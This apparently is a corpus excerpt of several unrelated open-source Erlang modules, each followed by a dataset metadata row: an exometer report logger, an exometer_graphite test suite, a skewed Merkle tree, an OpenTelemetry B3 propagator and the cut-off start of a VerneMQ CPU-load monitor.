        _ -> once
    end.
%% Client-side check
%% Client-side check: every `output' entry is kept, in order; the data will
%% later flow through them in that same order.
get_output(Opts) ->
    Outputs = [O || {output, O} <- Opts],
    [get_output(exometer_util:get_opt(mode, O), O) || O <- Outputs].
%% Build the per-mode output record from the option list.
get_output(tty, O) ->
    #tty{prefix = exometer_util:get_opt(prefix, O, [])};
get_output(ets, O) ->
    %% No table given: init_output (server side) is expected to create one.
    #ets{tab = exometer_util:get_opt(tab, O, undefined)};
get_output(internal, O) ->
    #int{process = exometer_util:get_opt(process, O)};
get_output(plugin, O) ->
    #plugin{module = exometer_util:get_opt(module, O),
            mod_state = exometer_util:get_opt(state, O, undefined)}.
%% Gen_server callbacks
%% @private
%% @private
%% Side-effecting setup (sockets, plugin processes) happens here; input is
%% initialized before output, matching the original evaluation order.
init({Id, Input, Output}) ->
    ActiveInput = init_input(Input),
    ActiveOutput = init_output(Output),
    {ok, #st{id = Id, input = ActiveInput, output = ActiveOutput}}.
%% @private
%% @private
%% `info' returns the instance's settings (see info/1); everything else is
%% rejected without crashing the server.
handle_call(info, _From, #st{id = Id, input = In, output = Out} = S) ->
    {reply, info_(Id, In, Out), S};
handle_call(_Req, _From, S) ->
    {reply, {error, unsupported}, S}.
%% @private
%% @private
%% {socket, Socket}: an accepted TCP socket is handed to this server
%% (presumably by the acceptor spawned in init_input/1 -- see
%% spawn_tcp_acceptor/2). If the socket arrived passive, re-enable the
%% configured active mode; non-TCP inputs ignore the message via the
%% catch-all clause below.
handle_cast({socket, Socket}, #st{input = #tcp{active = Active} = Tcp} = S) ->
    _ = case inet:getopts(Socket, [active]) of
            {ok, [{active, false}]} -> inet:setopts(Socket, [{active, Active}]);
            _ -> ok
        end,
    {noreply, S#st{input = Tcp#tcp{socket = Socket}}};
handle_cast(_Msg, S) ->
    {noreply, S}.
%% @private
%% Data from the active TCP socket: run it through the output chain, then
%% re-arm the socket's active mode if needed.
handle_info({tcp, Socket, Data}, #st{input = #tcp{socket = Socket,
                                                  active = Active},
                                     output = Out} = S) ->
    %% FIX: the updated output-chain state returned by handle_data/2 was
    %% discarded for TCP input (unlike the udp/plugin/internal clauses
    %% below), losing any plugin output state updates.
    Out1 = handle_data(Data, Out),
    check_active(Socket, Active),
    {noreply, S#st{output = Out1}};
%% Data from the UDP socket.
handle_info({udp, Socket, _Host, _Port, Data},
            #st{input = #udp{socket = Socket}, output = Out} = S) ->
    Out1 = handle_data(Data, Out),
    {noreply, S#st{output = Out1}};
%% Data forwarded by the input plugin process.
handle_info({plugin, Pid, Data}, #st{input = #plugin{process = Pid},
                                     output = Out} = S) ->
    Out1 = handle_data(Data, Out),
    {noreply, S#st{output = Out1}};
%% Flow control: {tcp_passive, _} / {udp_passive, _} arrive when an
%% {active, N} socket's counter reaches zero; "refill" the socket.
%% FIX: inet:setopts/2 takes a LIST of options; passing the bare
%% once | true | N value made the call fail, so the socket stayed passive
%% and input silently stopped. Wrap it as [{active, Active}], consistent
%% with the handle_cast({socket, _}, _) clause.
handle_info({tcp_passive, Socket}, #st{input = #tcp{socket = Socket,
                                                    active = Active}} = S) ->
    inet:setopts(Socket, [{active, Active}]),
    {noreply, S};
handle_info({udp_passive, Socket}, #st{input = #udp{socket = Socket,
                                                    active = Active}} = S) ->
    inet:setopts(Socket, [{active, Active}]),
    {noreply, S};
%% Plugins mimic socket flow control: answer {plugin_passive, Pid} with the
%% configured activity budget (see module doc).
handle_info({plugin_passive, Pid}, #st{input = #plugin{process = Pid,
                                                       active = Active}} = S) ->
    Pid ! {plugin_active, Active},
    {noreply, S};
%% Internal input: accept {?MODULE, Pid, Data} from the configured peer, or
%% from anyone when no peer was configured.
handle_info({?MODULE, P, Data}, #st{input = #int{process = Pl},
                                    output = Out} = S)
  when Pl =:= P; Pl =:= undefined ->
    Out1 = handle_data(Data, Out),
    {noreply, S#st{output = Out1}};
%% Drain anything unexpected so the mailbox cannot grow.
handle_info(_, S) ->
    {noreply, S}.
%% @private
terminate(_, _) ->
ok.
%% @private
code_change(_FromVsn, S, _Extra) ->
{ok, S}.
%% End gen_server callbacks
%% Assemble the proplist returned from handle_call(info, ...), with the
%% input/output records rendered as {RecName, Fields} terms via pp/1.
info_(ID, I, O) ->
    [{id, ID},
     {input, ensure_list(pp(I))},
     {output, ensure_list(pp(O))}].
%% Normalize pp/1 output to a list: a single (record) tuple is wrapped,
%% a list is passed through unchanged. Any other type is a crash (by design).
ensure_list(Item) when is_list(Item) ->
    Item;
ensure_list(Item) when is_tuple(Item) ->
    [Item].
%% Copied from git:uwiger/jobs/src/jobs_info.erl
%% Render a term for display: tuples recognized by the generated
%% '#is_record-'/1 function (presumably exprecs-generated — confirm)
%% become {RecName, [{Field, Value}, ...]} pairs; other tuples and lists
%% are walked recursively; everything else is returned unchanged.
pp(L) when is_list(L) ->
    [pp(X) || X <- L];
pp(X) ->
    case '#is_record-'(X) of
        true ->
            RecName = element(1,X),
            %% Pair each declared field name with its value (tail of the
            %% tuple, skipping the record tag), prettifying values too.
            {RecName, lists:zip(
                        '#info-'(RecName,fields),
                        pp(tl(tuple_to_list(X))))};
        false ->
            if is_tuple(X) ->
                    list_to_tuple(pp(tuple_to_list(X)));
               true ->
                    X
            end
    end.
%% Bring the configured input online. TCP listens asynchronously via a
%% linked acceptor (socket arrives later as a {socket, _} cast); UDP opens
%% its socket immediately; a plugin module starts its own input process;
%% `internal' needs no setup.
init_input(#tcp{port = Port,
                options = Opts} = T) ->
    _ = spawn_tcp_acceptor(Port, Opts),
    T;
init_input(#udp{port = Port, options = Opts} = U) ->
    {ok, Socket} = gen_udp:open(Port, Opts),
    U#udp{socket = Socket};
init_input(#plugin{module = Mod, mod_state = St} = P) ->
    %% Only {ok, Pid} is accepted; any other return crashes init (let it crash).
    case Mod:logger_init_input(St) of
        {ok, Pid} when is_pid(Pid) ->
            P#plugin{process = Pid}
    end;
init_input(#int{} = I) ->
    I.
%% Listen on Port and hand one accepted connection back to the owning
%% gen_server; controlling_process/2 is transferred first so the server
%% receives the socket's messages.
%% NOTE(review): exactly one accept is performed and the listen socket is
%% dropped when this process exits — confirm single-client use is intended.
spawn_tcp_acceptor(Port, Opts) ->
    Parent = self(),
    spawn_link(fun() ->
                       {ok, LSock} = gen_tcp:listen(Port, Opts),
                       {ok, Socket} = gen_tcp:accept(LSock),
                       ok = gen_tcp:controlling_process(Socket, Parent),
                       gen_server:cast(Parent, {socket, Socket})
               end).
%% Initialize every configured output in order.
init_output(Out) ->
    [init_output_(O) || O <- Out].
%% Per-output setup: tty and internal need none; an ets output creates
%% its table on demand; a plugin output runs its module's init callback.
init_output_(#tty{} = TTY) -> TTY;
init_output_(#int{} = Int) -> Int;
init_output_(#ets{tab = T} = E) ->
    Tab = case T of
              undefined ->
                  %% Table is owned by this gen_server process.
                  ets:new(?MODULE, [ordered_set]);
              _ ->
                  T
          end,
    E#ets{tab = Tab};
init_output_(#plugin{module = Mod, mod_state = St} = P) ->
    %% Only {ok, State} is accepted; anything else crashes init.
    {ok, St1} = Mod:logger_init_output(St),
    P#plugin{mod_state = St1}.
%% Re-arm {active, once} delivery after a message has been consumed;
%% every other mode needs no per-message action.
check_active(Sock, Mode) ->
    case Mode of
        once -> inet:setopts(Sock, [{active, once}]);
        _    -> ok
    end.
%% Feed Data through every configured output in order, threading both the
%% (possibly rewritten) data and each output's updated state; returns the
%% new list of output states in the original order.
handle_data(Data, Out) ->
    handle_data(Data, Out, []).
handle_data(Data, [Output | Rest], Acc) ->
    {NextData, Output1} = handle_data_(Data, Output),
    handle_data(NextData, Rest, [Output1 | Acc]);
handle_data(_Data, [], Acc) ->
    lists:reverse(Acc).
%% Apply one output to Data; returns {PossiblyRewrittenData, NewOutputState}.
%% tty: write the prefixed line to stdout.
handle_data_(Data, #tty{prefix = Pfx} = Out) ->
    io:fwrite(iolist_to_binary([Pfx, Data, $\n])),
    {Data, Out};
%% ets: store under the current timestamp as key.
handle_data_(Data, #ets{tab = T} = Out) ->
    ets:insert(T, {os:timestamp(), Data}),
    {Data, Out};
%% internal: forward to the configured process; send failures are swallowed.
handle_data_(Data, #int{process = P} = Out) ->
    try P ! {?MODULE, self(), Data} catch _:_ -> error end,
    {Data, Out};
handle_data_(Data, #plugin{module = Mod, mod_state = ModSt} = Out) ->
{Data1, ModSt1} = Mod:logger_handle_data(Data, ModSt),
{Data1, Out#plugin{mod_state = ModSt1}}. | src/external/cloudi_x_exometer_core/src/exometer_report_logger.erl | 0.675872 | 0.407157 | exometer_report_logger.erl | starcoder |
%/--------------------------------------------------------------------
%| Copyright 2017 Erisata, UAB (Ltd.)
%|
%| Licensed under the Apache License, Version 2.0 (the "License");
%| you may not use this file except in compliance with the License.
%| You may obtain a copy of the License at
%|
%| http://www.apache.org/licenses/LICENSE-2.0
%|
%| Unless required by applicable law or agreed to in writing, software
%| distributed under the License is distributed on an "AS IS" BASIS,
%| WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%| See the License for the specific language governing permissions and
%| limitations under the License.
%\--------------------------------------------------------------------
%%%
%%% Common Tests for `exometer_graphite' application.
%%%
-module(exometer_graphite_SUITE).
-compile([{parse_transform, lager_transform}]).
-export([all/0, init_per_suite/1, end_per_suite/1, init_per_testcase/2, end_per_testcase/2]).
-export([
test_message_sending/1,
test_static_configuration/1
]).
-define(APP, exometer_graphite).
-define(DEFAULT_TCP_SERVER_MOCK_PORT, 8049).
-define(REPORTER, exometer_graphite_reporter).
%%% ============================================================================
%%% Callbacks for `common_test'
%%% ============================================================================
%% @doc
%% CT API.
%%
all() -> [
test_message_sending,
test_static_configuration
].
%%
%% CT API, initialization.
%%
init_per_suite(Config) ->
application:load(lager),
application:set_env(lager, handlers, [{lager_console_backend, debug}]),
{ok, Apps} = application:ensure_all_started(?APP),
[{exometer_graphite_apps, Apps} | Config].
%%
%% CT API, cleanup.
%%
%% Stop every application that init_per_suite/1 started, in start order.
end_per_suite(Config) ->
    Apps = proplists:get_value(exometer_graphite_apps, Config),
    ok = lists:foreach(fun application:stop/1, Apps),
    ok.
%%
%% Log test case name at start
%%
init_per_testcase(TestCase, Config) ->
lager:debug("---------------------- ~p start", [TestCase]),
Config.
%%
%% Log test case name at end. Also, clean subscriptions and metrics.
%%
%% Drop every subscription held by the reporter and delete every exometer
%% entry, so each test case starts from a clean slate.
end_per_testcase(TestCase, _Config) ->
    lists:foreach(fun({Metric, _, _, _}) ->
        exometer_report:unsubscribe_all(?REPORTER, Metric)
    end, exometer_report:list_subscriptions(?REPORTER)),
    lists:foreach(fun({Name, _Type, _Status}) ->
        exometer:delete(Name)
    end, exometer:find_entries([])),
    lager:debug("---------------------- ~p end", [TestCase]),
    ok.
%%% ============================================================================
%%% Test cases.
%%% ============================================================================
%% @doc
%% Check, if static subscriptions are passed to exometer report.
%% Check, if a future subscription is working when its metric is added.
%% Check, if subscription is removed if a metric is removed.
%% Check, if automatic resubscription works.
%%
test_static_configuration(_Config) ->
exometer:new([testA, cpuUsage], gauge),
exometer:new([testB, memUsage], histogram),
exometer:new([testC, lager, warning], histogram), % Should be ignored.
exometer:new([testC, store, get_message], spiral),
ok = exometer:update_or_create([testD, lager, info], 1, histogram, []),
%
% Waiting for an automatic resubscription.
timer:sleep(2100),
ExpectedSubs = [
{[testD,lager,info],n,4000,[]},
{[testD,lager,info],min,4000,[]},
{[testD,lager,info],median,4000,[]},
{[testD,lager,info],mean,4000,[]},
{[testD,lager,info],max,4000,[]},
{[testD,lager,info],999,4000,[]},
{[testD,lager,info],99,4000,[]},
{[testD,lager,info],95,4000,[]},
{[testD,lager,info],90,4000,[]},
{[testD,lager,info],75,4000,[]},
{[testD,lager,info],50,4000,[]},
{[testC,store,get_message],one,10000,[]},
{[testC,store,get_message],count,10000,[]},
{[testB,memUsage],min,2000,[]},
{[testA,cpuUsage],value,2000,[]}],
ExpectedSubs = exometer_report:list_subscriptions(exometer_graphite_reporter),
%
% Checking a situation when a new metric fitting subscription is added.
ok = exometer:update_or_create([testE, lager, debug], 1, histogram, []),
ok = exometer:delete([testC, store, get_message]),
%
% Waiting for an automatic resubscription.
timer:sleep(2100),
%
% If same subscription is added to exometer twice, only one will be shown in
% exometer_report:list_subscriptions, though actually there would be two.
NewExpectedSubs = [
{[testE,lager,debug],min,5000,[]}, %% New
{[testE,lager,debug],mean,5000,[]}, %% New
{[testE,lager,debug],max,5000,[]}, %% New
{[testD,lager,info],n,4000,[]},
{[testD,lager,info],min,4000,[]},
{[testD,lager,info],median,4000,[]},
{[testD,lager,info],mean,4000,[]},
{[testD,lager,info],max,4000,[]},
{[testD,lager,info],999,4000,[]},
{[testD,lager,info],99,4000,[]},
{[testD,lager,info],95,4000,[]},
{[testD,lager,info],90,4000,[]},
{[testD,lager,info],75,4000,[]},
{[testD,lager,info],50,4000,[]},
% {[testC,store,get_message],one,10000,[]}, %% Deleted
% {[testC,store,get_message],count,10000,[]}, %% Deleted
{[testB,memUsage],min,2000,[]},
{[testA,cpuUsage],value,2000,[]}],
NewExpectedSubs = exometer_report:list_subscriptions(?REPORTER).
%% @doc
%% Check, if grouped pickle message sending to mock server is successful.
%%
test_message_sending(_Config) ->
Port = application:get_env(?APP, port, ?DEFAULT_TCP_SERVER_MOCK_PORT),
{ok, MockPid} = graphite_server_mock:start(Port, self()),
exometer:new([testA, cpuUsage], gauge),
exometer:new([testB, memUsage], histogram),
exometer_graphite_subscribers:force_resubscribe(),
exometer:update([testB, memUsage], 10),
Message = receive
{received, Data} ->
Data;
_Other ->
lager:debug("Unexpected message.")
after
4000 ->
lager:debug("Did NOT receive message"),
ok
end,
%
% node@host differs from system to system
% checking for <<"server1.*@*.testA.cpuUsage.value">>
{Metric1Start1, _} = binary:match(Message, <<"server1.">>),
{Metric1Start2, _} = binary:match(Message, <<".testA.cpuUsage.value">>),
{_, _} = binary:match(Message, <<"@">>, [{scope, {Metric1Start1, Metric1Start2 - Metric1Start1}}]),
%
% checking for <<"server1.*@*.testB.memUsage.min">>
{Metric2Start1, _} = binary:match(Message, <<"server1.">>),
{Metric2Start2, _} = binary:match(Message, <<".testB.memUsage.min">>),
{_, _} = binary:match(Message, <<"@">>, [{scope, {Metric2Start1, Metric2Start2 - Metric2Start1}}]),
ok = graphite_server_mock:stop(MockPid),
ok. | itest/exometer_graphite_SUITE.erl | 0.507568 | 0.403861 | exometer_graphite_SUITE.erl | starcoder |
%% @doc A module with a skewed merkle tree implementation as described
%% in https://medium.com/codechain/skewed-merkle-tree-259b984acc0c.
%% This module implements a skewed merkle tree where value can be added/stacked via add/3,
%% the time and memory it takes to create is linearly proportional to the number of values.
-module(skewed).
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-endif.
-export([
new/0, add/3, verify/3,
root_hash/1, height/1, count/1,
hash_value/1
]).
-record(skewed, {
root :: tree(),
count = 0 :: non_neg_integer()
}).
-record(leaf, {
hash :: hash(),
value :: any()
}).
-record(empty, {
hash = <<0:256>> :: hash()
}).
-record(node, {
hash :: hash(),
height = 0 :: non_neg_integer(),
left :: tree(),
right :: tree()
}).
-type hash() :: binary().
-type skewed() :: #skewed{}.
-type leaf() :: #leaf{}.
-type tree() :: #leaf{} | #empty{} | #node{}.
-export_type([skewed/0, hash/0]).
%% @doc
%% Create new empty skewed merkle tree.
%% @end
-spec new() -> skewed().
new() ->
#skewed{root=#empty{}, count=0}.
%% @doc
%% Add/stack new value (leaf) on top and recalculate root hash.
%% @end
%% O(1) per add: the previous root becomes the left child and the new
%% leaf the right child of a fresh root node.
-spec add(any(), function(), skewed()) -> skewed().
add(Value, HashFun, #skewed{root=Tree, count=Count}=Skewed) ->
    Leaf = to_leaf(Value, HashFun),
    Node = to_node(Tree, Leaf, tree_hash(Tree), tree_hash(Leaf), Count),
    Skewed#skewed{root=Node, count=Count+1}.
%% @doc
%% Verify will check that the HashToVerify is correctly in the tree with the provided,
%% in order, lists of hashes (proof) and compare it to the RootHash.
%% @end
-spec verify(hash(), [hash()], hash()) -> boolean().
%% With an empty proof, the target hash must itself be the root.
verify(HashToVerify, [], RootHash) ->
    HashToVerify == RootHash;
%% Otherwise rebuild the skewed spine: the first proof hash is the
%% deepest leaf, the target hash is stacked on top of it, and each
%% remaining proof hash is stacked in order; the rebuilt root must
%% equal RootHash.
verify(HashToVerify, [FirstHash|Hashes], RootHash) ->
    FirstLeaf = #leaf{hash=FirstHash, value=undefined},
    Skewed = lists:foldl(
               fun(Hash, #skewed{root=Tree, count=Count}=Acc) ->
                       Leaf = to_leaf(Hash),
                       Node = to_node(Tree, Leaf, tree_hash(Tree), tree_hash(Leaf), Count),
                       Acc#skewed{root=Node, count=Count+1}
               end,
               #skewed{root=FirstLeaf, count=0},
               [HashToVerify|Hashes]
             ),
    ?MODULE:root_hash(Skewed) == RootHash.
%% @doc
%% Gets the root hash of the given skewed tree. This is a fast
%% operation since the hash was calculated on construction of the tree.
%% @end
-spec root_hash(skewed()) -> hash().
root_hash(#skewed{root=Tree}) ->
tree_hash(Tree).
%% @doc
%% Get the height of the given skewed tree. This is a fast operation
%% since the height was calculated on construction of the tree.
%% @end
-spec height(skewed()) -> non_neg_integer().
height(#skewed{root=Tree}) ->
tree_height(Tree).
%% @doc
%% get the number of leaves int he skewed tree.
%% @end
-spec count(skewed()) -> non_neg_integer().
count(#skewed{count=Count}) ->
Count.
%% @doc
%% A commonly used hash value for skewed trees. This function
%% will SHA256 hash the given value when it is binary. A convenience
%% form detects non-binary forms and uses term_to_binary/1 to convert
%% other erlang terms to a binary form. It is not recommended to use
%% the non-binary form if the resulting trees or proofs are to be sent
%% over a network.
%% @end
-spec hash_value(any()) -> hash().
%% SHA-256 of the binary itself; any other term is first serialized with
%% term_to_binary/1 (see the @doc caveat about sending such trees over a
%% network).
hash_value(Bin) when is_binary(Bin) ->
    crypto:hash(sha256, Bin);
hash_value(Term) ->
    hash_value(term_to_binary(Term)).
%%====================================================================
%% Internal functions
%%====================================================================
-spec to_leaf(hash()) -> leaf().
to_leaf(Hash) ->
#leaf{hash=Hash, value=undefined}.
-spec to_leaf(term(), fun((term()) -> hash())) -> leaf().
to_leaf(Value, HashFun) ->
#leaf{value=Value, hash=HashFun(Value)}.
-spec to_node(tree(), tree(), hash(), hash(), non_neg_integer()) -> tree().
to_node(L, R, LHash, RHash, Height) ->
Hash = crypto:hash(sha256, <<LHash/binary, RHash/binary>>),
#node{left=L, right=R, height=Height+1, hash=Hash}.
-spec tree_hash(tree()) -> hash().
%% Every node variant caches its hash in a record field, so extraction is
%% a constant-time match (clauses are disjoint; order is immaterial).
tree_hash(#empty{hash = H}) -> H;
tree_hash(#leaf{hash = H})  -> H;
tree_hash(#node{hash = H})  -> H.
-spec tree_height(tree()) -> non_neg_integer().
%% Heights are fixed for empty/leaf and cached on interior nodes.
tree_height(#empty{})          -> 0;
tree_height(#leaf{})           -> 1;
tree_height(#node{height = H}) -> H.
%% ------------------------------------------------------------------
%% EUNIT Tests
%% ------------------------------------------------------------------
-ifdef(TEST).
verify_test() ->
HashFun = fun hash_value/1,
Size = 5,
Tree = lists:foldl(
fun(Value, Acc) ->
add(Value, HashFun, Acc)
end,
new(),
lists:seq(1, Size)
),
RootHash = ?MODULE:root_hash(Tree),
Value = 3,
Hash2 = <<55,252,129,255,194,115,98,103,168,132,199,77,143,180,26,174,29,219,145,126,179,56,47,160,125,10,249,248,75,49,96,253>>,
ValueHashes = lists:foldr(fun(V, A) -> [HashFun(V)|A] end, [], lists:seq(Value+1, Size)),
?assert(verify(HashFun(Value), [Hash2] ++ ValueHashes, RootHash)),
?assertNot(verify(HashFun(Value), [], RootHash)),
?assert(verify(RootHash, [], RootHash)),
ok.
height_test() ->
HashFun = fun hash_value/1,
Tree0 = new(),
?assertEqual(0, height(Tree0)),
Tree1 = lists:foldl(
fun(Value, Acc) ->
add(Value, HashFun, Acc)
end,
new(),
lists:seq(1, 10)
),
?assertEqual(10, height(Tree1)),
?assertEqual(1, tree_height(#leaf{})),
ok.
count_test() ->
HashFun = fun hash_value/1,
Tree0 = new(),
?assertEqual(0, count(Tree0)),
Tree1 = lists:foldl(
fun(Value, Acc) ->
add(Value, HashFun, Acc)
end,
new(),
lists:seq(1, 10)
),
?assertEqual(10, count(Tree1)),
ok.
-endif. | src/skewed.erl | 0.732783 | 0.634855 | skewed.erl | starcoder |
%%%------------------------------------------------------------------------
%% Copyright 2019, OpenTelemetry Authors
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% @doc An implementation of {@link otel_propagator_text_map} that injects and
%% extracts trace context using the B3 specification from Zipkin.
%%
%% Since `trace_context' and `baggage' are the two default propagators the
%% global TextMap Propagators must be configured if B3 is to be used for
%% propagation:
%%
%% ```
%% {text_map_propagators, [b3multi, baggage]},
%% '''
%%
%% ```
%% CompositePropagator = otel_propagator_text_map_composite:create([b3multi, baggage]),
%% opentelemetry:set_text_map_propagator(CompositePropagator).
%% '''
%%
%% It is also possible to set a separate list of injectors or extractors.
%% For example, if the service should extract B3 encoded context but you
%% only want to inject context encoded with the W3C TraceContext format
%% (maybe you have some services only supporting B3 that are making requests
%% to your server but you have no reason to continue propagating in both
%% formats when communicating to other services further down the stack).
%% In that case you would instead set configuration like:
%%
%%
%% ```
%% {text_map_extractors, [b3multi, trace_context, baggage]},
%% {text_map_injectors, [trace_context, baggage]},
%% '''
%%
%% Or using calls to {@link opentelemetry} at runtime:
%%
%% ```
%% B3CompositePropagator = otel_propagator_text_map_composite:create([b3multi, trace_context, baggage]),
%% CompositePropagator = otel_propagator_text_map_composite:create([trace_context, baggage]),
%% opentelemetry:set_text_map_extractor(B3CompositePropagator),
%% opentelemetry:set_text_map_injector(CompositePropagator).
%% '''
%% @end
%%%-----------------------------------------------------------------------
-module(otel_propagator_b3multi).
-behaviour(otel_propagator_text_map).
-export([fields/1,
inject/4,
extract/5]).
-include("opentelemetry.hrl").
-define(B3_TRACE_ID, <<"X-B3-TraceId">>).
-define(B3_SPAN_ID, <<"X-B3-SpanId">>).
-define(B3_SAMPLED, <<"X-B3-Sampled">>).
-define(B3_IS_SAMPLED(S), S =:= "1" orelse S =:= <<"1">> orelse S =:= "true" orelse S =:= <<"true">>).
fields(_) ->
[?B3_TRACE_ID, ?B3_SPAN_ID, ?B3_SAMPLED].
-spec inject(Context, Carrier, CarrierSetFun, Options) -> Carrier
      when Context :: otel_ctx:t(),
           Carrier :: otel_propagator:carrier(),
           CarrierSetFun :: otel_propagator_text_map:carrier_set(),
           Options :: otel_propagator_text_map:propagator_options().
%% Write the current span context into the carrier as the three multi-header
%% B3 fields; a missing or zeroed span context leaves the carrier untouched.
inject(Ctx, Carrier, CarrierSet, _Options) ->
    case otel_tracer:current_span_ctx(Ctx) of
        #span_ctx{trace_id=TraceId,
                  span_id=SpanId,
                  trace_flags=TraceOptions} when TraceId =/= 0 andalso SpanId =/= 0 ->
            %% Only the low `sampled' bit of the trace flags is propagated.
            Options = case TraceOptions band 1 of 1 -> <<"1">>; _ -> <<"0">> end,
            %% Zero-padded lowercase hex: 32 chars for the 128-bit trace id,
            %% 16 chars for the 64-bit span id.
            EncodedTraceId = io_lib:format("~32.16.0b", [TraceId]),
            EncodedSpanId = io_lib:format("~16.16.0b", [SpanId]),
            CarrierSet(?B3_TRACE_ID, iolist_to_binary(EncodedTraceId),
                       CarrierSet(?B3_SPAN_ID, iolist_to_binary(EncodedSpanId),
                                  CarrierSet(?B3_SAMPLED, Options, Carrier)));
        _ ->
            Carrier
    end.
-spec extract(Context, Carrier, CarrierKeysFun, CarrierGetFun, Options) -> Context
      when Context :: otel_ctx:t(),
           Carrier :: otel_propagator:carrier(),
           CarrierKeysFun :: otel_propagator_text_map:carrier_keys(),
           CarrierGetFun :: otel_propagator_text_map:carrier_get(),
           Options :: otel_propagator_text_map:propagator_options().
%% Read the X-B3-* headers from the carrier and install the remote span
%% context into Ctx. Any malformed or missing field — an `invalid' throw
%% from trace_id/2 or span_id/2, or a badarg from the base-16 conversion —
%% leaves Ctx unchanged.
extract(Ctx, Carrier, _CarrierKeysFun, CarrierGet, _Options) ->
    try
        TraceId = trace_id(Carrier, CarrierGet),
        SpanId = span_id(Carrier, CarrierGet),
        Sampled = CarrierGet(?B3_SAMPLED, Carrier),
        SpanCtx =
            otel_tracer:from_remote_span(string_to_integer(TraceId, 16),
                                         string_to_integer(SpanId, 16),
                                         case Sampled of True when ?B3_IS_SAMPLED(True) -> 1; _ -> 0 end),
        otel_tracer:set_current_span(Ctx, SpanCtx)
    catch
        throw:invalid ->
            Ctx;
        %% thrown if _to_integer fails
        error:badarg ->
            Ctx
    end.
%% Fetch the X-B3-TraceId header and validate it: must be a string/binary
%% of 32 (128-bit) or 16 (64-bit) hex characters, otherwise `invalid' is
%% thrown for extract/5 to catch.
trace_id(Carrier, CarrierGet) ->
    TraceId = CarrierGet(?B3_TRACE_ID, Carrier),
    Valid = (is_list(TraceId) orelse is_binary(TraceId))
        andalso (string:length(TraceId) =:= 32 orelse string:length(TraceId) =:= 16),
    case Valid of
        true  -> TraceId;
        false -> throw(invalid)
    end.
%% Fetch the X-B3-SpanId header and validate it: must be a string/binary
%% of exactly 16 hex characters, otherwise `invalid' is thrown for
%% extract/5 to catch.
span_id(Carrier, CarrierGet) ->
    SpanId = CarrierGet(?B3_SPAN_ID, Carrier),
    Valid = (is_list(SpanId) orelse is_binary(SpanId))
        andalso string:length(SpanId) =:= 16,
    case Valid of
        true  -> SpanId;
        false -> throw(invalid)
    end.
string_to_integer(S, Base) when is_binary(S) ->
binary_to_integer(S, Base);
string_to_integer(S, Base) when is_list(S) ->
list_to_integer(S, Base). | apps/opentelemetry_api/src/otel_propagator_b3multi.erl | 0.697918 | 0.548794 | otel_propagator_b3multi.erl | starcoder |
%% Copyright 2014 Erlio GmbH Basel Switzerland (http://erl.io)
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
-module(vmq_sysmon).
-behaviour(gen_server).
%% API
-export([start_link/0,
cpu_load_level/0]).
%% gen_server callbacks
-export([init/1,
handle_call/3,
handle_cast/2,
handle_info/2,
terminate/2,
code_change/3]).
-record(state, {samples=queue:new()}).
-define(SAMPLE_INTERVAL, 2000).
-define(NR_OF_SAMPLES, 10).
%%%===================================================================
%%% API
%%%===================================================================
%%--------------------------------------------------------------------
%% @doc
%% Starts the server
%%
%% @spec start_link() -> {ok, Pid} | ignore | {error, Error}
%% @end
%%--------------------------------------------------------------------
start_link() ->
gen_server:start_link({local, ?MODULE}, ?MODULE, [], []).
%% Read the most recently computed load level (0..3, see calc/1) from the
%% public ETS table maintained by this server. Crashes with badmatch if
%% called before the first sample has been stored.
cpu_load_level() ->
    [{_, Level}] = ets:lookup(?MODULE, cpu_load_level),
    Level.
%%%===================================================================
%%% gen_server callbacks
%%%===================================================================
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Initializes the server
%%
%% @spec init(Args) -> {ok, State} |
%% {ok, State, Timeout} |
%% ignore |
%% {stop, Reason}
%% @end
%%--------------------------------------------------------------------
init([]) ->
_ = cpu_sup:util([per_cpu]), % first return value is rubbish, per the docs
_ = ets:new(?MODULE, [public, named_table, {read_concurrency, true}]),
%% Add our system_monitor event handler. We do that here because
%% we have a process at our disposal (i.e. ourself) to receive the
%% notification in the very unlikely event that the
%% riak_core_sysmon_handler has crashed and been removed from the
%% riak_sysmon_handler gen_event server. (If we had a supervisor
%% or app-starting process add the handler, then if the handler
%% crashes, nobody will act on the crash notification.)
vmq_sysmon_handler:add_handler(),
{ok, #state{}, 0}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Handling call messages
%%
%% @spec handle_call(Request, From, State) ->
%% {reply, Reply, State} |
%% {reply, Reply, State, Timeout} |
%% {noreply, State} |
%% {noreply, State, Timeout} |
%% {stop, Reason, Reply, State} |
%% {stop, Reason, State}
%% @end
%%--------------------------------------------------------------------
handle_call(_Request, _From, State) ->
Reply = ok,
{reply, Reply, State}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Handling cast messages
%%
%% @spec handle_cast(Msg, State) -> {noreply, State} |
%% {noreply, State, Timeout} |
%% {stop, Reason, State}
%% @end
%%--------------------------------------------------------------------
handle_cast(_Msg, State) ->
{noreply, State}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Handling all non call/cast messages
%%
%% @spec handle_info(Info, State) -> {noreply, State} |
%% {noreply, State, Timeout} |
%% {stop, Reason, State}
%% @end
%%--------------------------------------------------------------------
handle_info(timeout, #state{samples=Samples} = State) ->
CPUAvg = cpu_sample(),
NewSamples =
case queue:len(Samples) of
L when L >= ?NR_OF_SAMPLES ->
queue:in(CPUAvg, queue:drop(Samples));
_ ->
queue:in(CPUAvg, Samples)
end,
Level = calc(NewSamples),
ets:insert(?MODULE, {cpu_load_level, Level}),
{noreply, State#state{samples=NewSamples}, ?SAMPLE_INTERVAL};
handle_info({gen_event_EXIT, riak_core_sysmon_handler, _}, State) ->
%% SASL will create an error message, no need for us to duplicate it.
%%
%% Our handler should never crash, but it did indeed crash. If
